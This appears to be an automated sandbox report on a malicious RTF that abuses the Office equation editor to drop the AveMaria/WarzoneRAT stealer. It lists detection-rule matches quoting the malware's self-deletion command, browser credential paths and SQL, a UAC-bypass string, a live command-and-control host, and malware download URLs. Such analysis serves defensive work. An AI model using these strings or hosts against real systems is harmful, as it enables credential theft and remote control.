8.0.gnwnekc.exe.400000.5.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x12cc0:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x117f4:$a2: SMTP Password 0x157f0:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x15910:$a7: /n:%temp%\ellocnak.xml 0x15940:$a9: Hey I'm Admin 0x116bc:$a10: \logins.json 0x11d04:$a11: Accounts\Account.rec0 0x10e1c:$a12: warzone160
8.0.gnwnekc.exe.400000.5.unpack	AveMaria_WarZone	unknown	unknown	0x12cc0:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x12bb8:$str2: MsgBox.exe 0x12d2c:$str4: \System32\cmd.exe 0x11e10:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x117f4:$str8: SMTP Password 0x11138:$str11: \Google\Chrome\User Data\Default\Login Data 0x11ddc:$str12: \sqlmap.dll 0x11114:$str14: SELECT * FROM logins 0x157f0:$str16: Elevation:Administrator!new 0x15910:$str17: /n:%temp%
8.3.gnwnekc.exe.8d6540.0.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x5c88:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
8.3.gnwnekc.exe.8d6540.0.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x5c88:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x5c88:$c1: Elevation:Administrator!new:
8.3.gnwnekc.exe.8d6540.0.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
8.3.gnwnekc.exe.8d6540.0.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
8.3.gnwnekc.exe.8d6540.0.raw.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x2f14:$s1: RDPClip 0x39e8:$s2: Grabber 0x2f46:$s5: @\cmd.exe 0x5da8:$s6: /n:%temp%\ellocnak.xml 0x5dd8:$s7: Hey I'm Admin 0x19b4:$s8: warzone160
8.3.gnwnekc.exe.8d6540.0.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x3858:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x238c:$a2: SMTP Password 0x5c88:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x5da8:$a7: /n:%temp%\ellocnak.xml 0x5dd8:$a9: Hey I'm Admin 0x2254:$a10: \logins.json 0x289c:$a11: Accounts\Account.rec0 0x19b4:$a12: warzone160
8.3.gnwnekc.exe.8d6540.0.raw.unpack	AveMaria_WarZone	unknown	unknown	0x3858:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x3750:$str2: MsgBox.exe 0x38c4:$str4: \System32\cmd.exe 0x29a8:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x238c:$str8: SMTP Password 0x1cd0:$str11: \Google\Chrome\User Data\Default\Login Data 0x2974:$str12: \sqlmap.dll 0x1cac:$str14: SELECT * FROM logins 0x5c88:$str16: Elevation:Administrator!new 0x5da8:$str17: /n:%temp%
8.0.gnwnekc.exe.400000.0.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
8.0.gnwnekc.exe.400000.0.unpack	AveMaria_WarZone	unknown	unknown	0x134c0:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x133b8:$str2: MsgBox.exe 0x1352c:$str4: \System32\cmd.exe 0x12610:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x11ff4:$str8: SMTP Password 0x11938:$str11: \Google\Chrome\User Data\Default\Login Data 0x125dc:$str12: \sqlmap.dll 0x11914:$str14: SELECT * FROM logins
8.2.gnwnekc.exe.418070.1.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
8.2.gnwnekc.exe.418070.1.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xd80:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xd80:$c1: Elevation:Administrator!new:
8.2.gnwnekc.exe.418070.1.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
8.3.gnwnekc.exe.8db448.1.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0xd80:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
8.3.gnwnekc.exe.8db448.1.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0xd80:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0xd80:$c1: Elevation:Administrator!new:
8.3.gnwnekc.exe.8db448.1.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
8.0.gnwnekc.exe.400000.3.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
8.0.gnwnekc.exe.400000.3.unpack	AveMaria_WarZone	unknown	unknown	0x134c0:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x133b8:$str2: MsgBox.exe 0x1352c:$str4: \System32\cmd.exe 0x12610:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x11ff4:$str8: SMTP Password 0x11938:$str11: \Google\Chrome\User Data\Default\Login Data 0x125dc:$str12: \sqlmap.dll 0x11914:$str14: SELECT * FROM logins
8.0.gnwnekc.exe.400000.5.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
8.0.gnwnekc.exe.400000.5.raw.unpack	AveMaria_WarZone	unknown	unknown	0x144c0:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x143b8:$str2: MsgBox.exe 0x1452c:$str4: \System32\cmd.exe 0x13610:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x12ff4:$str8: SMTP Password 0x12938:$str11: \Google\Chrome\User Data\Default\Login Data 0x135dc:$str12: \sqlmap.dll 0x12914:$str14: SELECT * FROM logins
8.0.gnwnekc.exe.400000.4.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
8.0.gnwnekc.exe.400000.4.unpack	AveMaria_WarZone	unknown	unknown	0x134c0:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x133b8:$str2: MsgBox.exe 0x1352c:$str4: \System32\cmd.exe 0x12610:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x11ff4:$str8: SMTP Password 0x11938:$str11: \Google\Chrome\User Data\Default\Login Data 0x125dc:$str12: \sqlmap.dll 0x11914:$str14: SELECT * FROM logins
6.2.gnwnekc.exe.420000.3.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x13ff0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
6.2.gnwnekc.exe.420000.3.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x13ff0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x13ff0:$c1: Elevation:Administrator!new:
6.2.gnwnekc.exe.420000.3.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
6.2.gnwnekc.exe.420000.3.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
6.2.gnwnekc.exe.420000.3.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x10b7c:$s1: RDPClip 0x11650:$s2: Grabber 0x10bae:$s5: @\cmd.exe 0x14110:$s6: /n:%temp%\ellocnak.xml 0x14140:$s7: Hey I'm Admin 0x1021c:$s8: warzone160
6.2.gnwnekc.exe.420000.3.unpack	AveMaria_WarZone	unknown	unknown	0x114c0:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x113b8:$str2: MsgBox.exe 0x1152c:$str4: \System32\cmd.exe 0x10538:$str11: \Google\Chrome\User Data\Default\Login Data 0x10514:$str14: SELECT * FROM logins 0x13ff0:$str16: Elevation:Administrator!new 0x14110:$str17: /n:%temp%
6.2.gnwnekc.exe.420000.3.raw.unpack	Codoso_Gh0st_2	Detects Codoso APT Gh0st Malware	Florian Roth	0x157f0:$s13: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
6.2.gnwnekc.exe.420000.3.raw.unpack	Codoso_Gh0st_1	Detects Codoso APT Gh0st Malware	Florian Roth	0x157f0:$x3: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x157f0:$c1: Elevation:Administrator!new:
6.2.gnwnekc.exe.420000.3.raw.unpack	JoeSecurity_UACMe	Yara detected UACMe UAC Bypass tool	Joe Security
6.2.gnwnekc.exe.420000.3.raw.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
6.2.gnwnekc.exe.420000.3.raw.unpack	MALWARE_Win_WarzoneRAT	Detects AveMaria/WarzoneRAT	ditekSHen	0x1237c:$s1: RDPClip 0x12e50:$s2: Grabber 0x123ae:$s5: @\cmd.exe 0x15910:$s6: /n:%temp%\ellocnak.xml 0x15940:$s7: Hey I'm Admin 0x10e1c:$s8: warzone160
6.2.gnwnekc.exe.420000.3.raw.unpack	Windows_Trojan_AveMaria_31d2bce9	unknown	unknown	0x12cc0:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x117f4:$a2: SMTP Password 0x157f0:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09} 0x15910:$a7: /n:%temp%\ellocnak.xml 0x15940:$a9: Hey I'm Admin 0x116bc:$a10: \logins.json 0x11d04:$a11: Accounts\Account.rec0 0x10e1c:$a12: warzone160
6.2.gnwnekc.exe.420000.3.raw.unpack	AveMaria_WarZone	unknown	unknown	0x12cc0:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x12bb8:$str2: MsgBox.exe 0x12d2c:$str4: \System32\cmd.exe 0x11e10:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x117f4:$str8: SMTP Password 0x11138:$str11: \Google\Chrome\User Data\Default\Login Data 0x11ddc:$str12: \sqlmap.dll 0x11114:$str14: SELECT * FROM logins 0x157f0:$str16: Elevation:Administrator!new 0x15910:$str17: /n:%temp%
8.0.gnwnekc.exe.400000.1.unpack	JoeSecurity_AveMaria	Yara detected AveMaria stealer	Joe Security
8.0.gnwnekc.exe.400000.1.unpack	AveMaria_WarZone	unknown	unknown	0x134c0:$str1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q 0x133b8:$str2: MsgBox.exe 0x1352c:$str4: \System32\cmd.exe 0x12610:$str7: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList 0x11ff4:$str8: SMTP Password 0x11938:$str11: \Google\Chrome\User Data\Default\Login Data 0x125dc:$str12: \sqlmap.dll 0x11914:$str14: SELECT * FROM logins
Click to see the 76 entries

Sigma Signatures

Exploits

Sigma detected: EQNEDT32.EXE connecting to internet

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 144.76.136.153, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2724, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49171

Sigma detected: File Dropped By EQNEDT32EXE

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2724, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\mwele[1].exe

Snort Signatures

ET TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound) - Source IP: 45.137.65.132 - Destination IP: 192.168.2.22

Timestamp:	45.137.65.132192.168.2.227410491732036735 01/05/23-12:33:05.086076
SID:	2036735
Source Port:	7410
Destination Port:	49173
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Ave Maria/Warzone RAT BeaconResponse - Source IP: 192.168.2.22 - Destination IP: 45.137.65.132

Timestamp:	192.168.2.2245.137.65.1324917374102852327 01/05/23-12:33:05.104273
SID:	2852327
Source Port:	49173
Destination Port:	7410
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Ave Maria/Warzone RAT PingResponse - Source IP: 192.168.2.22 - Destination IP: 45.137.65.132

Timestamp:	192.168.2.2245.137.65.1324917374102852328 01/05/23-12:34:45.168154
SID:	2852328
Source Port:	49173
Destination Port:	7410
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin - Source IP: 192.168.2.22 - Destination IP: 45.137.65.132

Timestamp:	192.168.2.2245.137.65.1324917374102036734 01/05/23-12:33:05.104273
SID:	2036734
Source Port:	49173
Destination Port:	7410
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Ave Maria/Warzone RAT InitializePacket - Source IP: 45.137.65.132 - Destination IP: 192.168.2.22

Timestamp:	45.137.65.132192.168.2.227410491732852326 01/05/23-12:34:25.148472
SID:	2852326
Source Port:	7410
Destination Port:	49173
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Ave Maria/Warzone RAT PingCommand - Source IP: 45.137.65.132 - Destination IP: 192.168.2.22

Timestamp:	45.137.65.132192.168.2.227410491732852329 01/05/23-12:34:45.165117
SID:	2852329
Source Port:	7410
Destination Port:	49173
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://5.206.225.104/dll/freebl3.dll	URL Reputation: Label: malware
Source: http://5.206.225.104/dll/nss3.dll	URL Reputation: Label: malware
Source: http://5.206.225.104/dll/nss3.dll	URL Reputation: Label: malware
Source: http://5.206.225.104/dll/softokn3.dll	URL Reputation: Label: malware

Multi AV Scanner detection for submitted file

Source: SecuriteInfo.com.Exploit.CVE-2018-0798.4.16955.24932.rtf	ReversingLabs: Detection: 27%
Source: SecuriteInfo.com.Exploit.CVE-2018-0798.4.16955.24932.rtf	Virustotal: Detection: 22%			Perma Link

Yara detected AveMaria stealer

Source: Yara match	File source: 8.3.gnwnekc.exe.8d6540.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.gnwnekc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.gnwnekc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.gnwnekc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.gnwnekc.exe.8d4cd0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.gnwnekc.exe.8d4cd0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.gnwnekc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.gnwnekc.exe.8d6540.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.gnwnekc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.gnwnekc.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.gnwnekc.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.gnwnekc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.gnwnekc.exe.420000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.gnwnekc.exe.420000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.gnwnekc.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.913528927.00000000008D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.911229292.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.913357063.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.913211098.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.913236124.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.913377903.00000000008D2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.914184912.0000000000420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gnwnekc.exe PID: 508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: gnwnekc.exe PID: 2052, type: MEMORYSTR

Multi AV Scanner detection for domain / URL

Source: http://5.206.225.104/dll/mozglue.dll	Virustotal: Detection: 8%	Perma Link
Source: http://5.206.225.104/dll/msvcp140.dll	Virustotal: Detection: 10%	Perma Link
Source: http://5.206.225.104/dll/vcruntime140.dll	Virustotal: Detection: 7%	Perma Link

Source: 8.0.gnwnekc.exe.400000.5.unpack	Avira: Label: TR/Redcap.ghjpt
Source: 8.2.gnwnekc.exe.400000.0.unpack	Avira: Label: TR/Redcap.ghjpt

Source: 8.2.gnwnekc.exe.400000.0.raw.unpack

Malware Configuration Extractor: AveMaria {"C2 url": "mcmac.duckdns.org", "port": 7410}

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 8_2_00409C70 lstrlenA,CryptStringToBinaryA,lstrcpyA,	8_2_00409C70
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 8_2_00409150 RegQueryValueExW,GlobalAlloc,CryptUnprotectData,lstrcpyW,	8_2_00409150
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 8_2_0040ADBB PathFileExistsW,CopyFileW,CryptUnprotectData,LocalFree,	8_2_0040ADBB

Exploits

Yara detected UACMe UAC Bypass tool

Source: Yara match	File source: 8.3.gnwnekc.exe.8d6540.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.gnwnekc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.gnwnekc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.gnwnekc.exe.8db448.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.gnwnekc.exe.8d4cd0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.gnwnekc.exe.434a70.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.0.gnwnekc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.gnwnekc.exe.8d6540.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.gnwnekc.exe.418070.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.gnwnekc.exe.8db448.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.gnwnekc.exe.420000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.gnwnekc.exe.420000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.1165804046.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.913307044.00000000008DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.911346295.0000000000418000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.913211098.00000000008C5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.913236124.00000000008D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.914184912.0000000000420000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: gnwnekc.exe PID: 508, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: gnwnekc.exe PID: 2052, type: MEMORYSTR

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\word.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\user\AppData\Roaming\word.exe			Jump to behavior

Office equation editor establishes network connection

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Network connect: IP: 144.76.136.153 Port: 80			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Network connect: IP: 144.76.136.153 Port: 443			Jump to behavior

Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 144.76.136.153:443 -> 192.168.2.22:49172 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe

Directory created: C:\Program Files\Microsoft DN1

Jump to behavior

Source:	Binary string: wntdll.pdb source: gnwnekc.exe, 00000006.00000003.907310568.0000000019F50000.00000004.00001000.00020000.00000000.sdmp, gnwnekc.exe, 00000006.00000003.907105006.0000000019DF0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\xampp\htdocs\5e856c39beb3488c816ca1901b5ae502\Loader\Release\Loader.pdb source: word.exe, 00000005.00000002.921300793.000000000040C000.00000004.00000001.01000000.00000004.sdmp, word.exe, 00000005.00000002.921515676.0000000002851000.00000004.00000800.00020000.00000000.sdmp, gnwnekc.exe, 00000006.00000002.914389407.0000000001C00000.00000004.00001000.00020000.00000000.sdmp, gnwnekc.exe, 00000006.00000000.902930072.000000000040F000.00000002.00000001.01000000.00000005.sdmp, gnwnekc.exe, 00000006.00000002.914164339.000000000040F000.00000002.00000001.01000000.00000005.sdmp, gnwnekc.exe, 00000008.00000000.906875049.000000000040F000.00000002.00000001.01000000.00000005.sdmp, gnwnekc.exe, 00000008.00000002.1166081575.0000000003250000.00000004.00000800.00020000.00000000.sdmp, wwpicppqkrphnp.exe, 00000009.00000002.959141339.000000000040F000.00000002.00000001.01000000.00000007.sdmp, wwpicppqkrphnp.exe, 00000009.00000000.935537740.000000000040F000.00000002.00000001.01000000.00000007.sdmp, nsmF993.tmp.5.dr, gnwnekc.exe.5.dr, wwpicppqkrphnp.exe.6.dr

Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe

Code function: 8_2_0040DB53 GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetDriveTypeW,

8_2_0040DB53

Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	5_2_00405D74
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0040699E FindFirstFileW,FindClose,	5_2_0040699E
Source: C:\Users\user\AppData\Roaming\word.exe	Code function: 5_2_0040290B FindFirstFileW,	5_2_0040290B
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 6_2_0040756A _free,_free,FindFirstFileExW,	6_2_0040756A
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 6_2_0040761E FindFirstFileExW,FindNextFileW,FindClose,	6_2_0040761E
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 8_2_00408917 GetFullPathNameA,PathCombineA,PathCombineA,FindFirstFileA,PathCombineA,PathCombineA,FindNextFileA,	8_2_00408917
Source: C:\Users\user\AppData\Local\Temp\gnwnekc.exe	Code function: 8_2_0040DA4F FindFirstFileW,FindNextFileW,	8_2_0040DA4F
Source: C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe	Code function: 9_2_0040756A _free,_free,FindFirstFileExW,	9_2_0040756A
Source: C:\Users\user\AppData\Roaming\atqshicruhnkpj\wwpicppqkrphnp.exe	Code function: 9_2_0040761E FindFirstFileExW,FindNextFileW,FindClose,	9_2_0040761E

Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 144.76.136.153:80
Source: global traffic	TCP traffic: 144.76.136.153:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 144.76.136.153:80
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 144.76.136.153:80
Source: global traffic	TCP traffic: 144.76.136.153:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 144.76.136.153:80 -> 192.168.2.22:49171
Source: global traffic	TCP traffic: 192.168.2.22:49171 -> 144.76.136.153:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 144.76.136.153:443
Source: global traffic	TCP traffic: 144.76.136.153:443 -> 192.168.2.22:49172
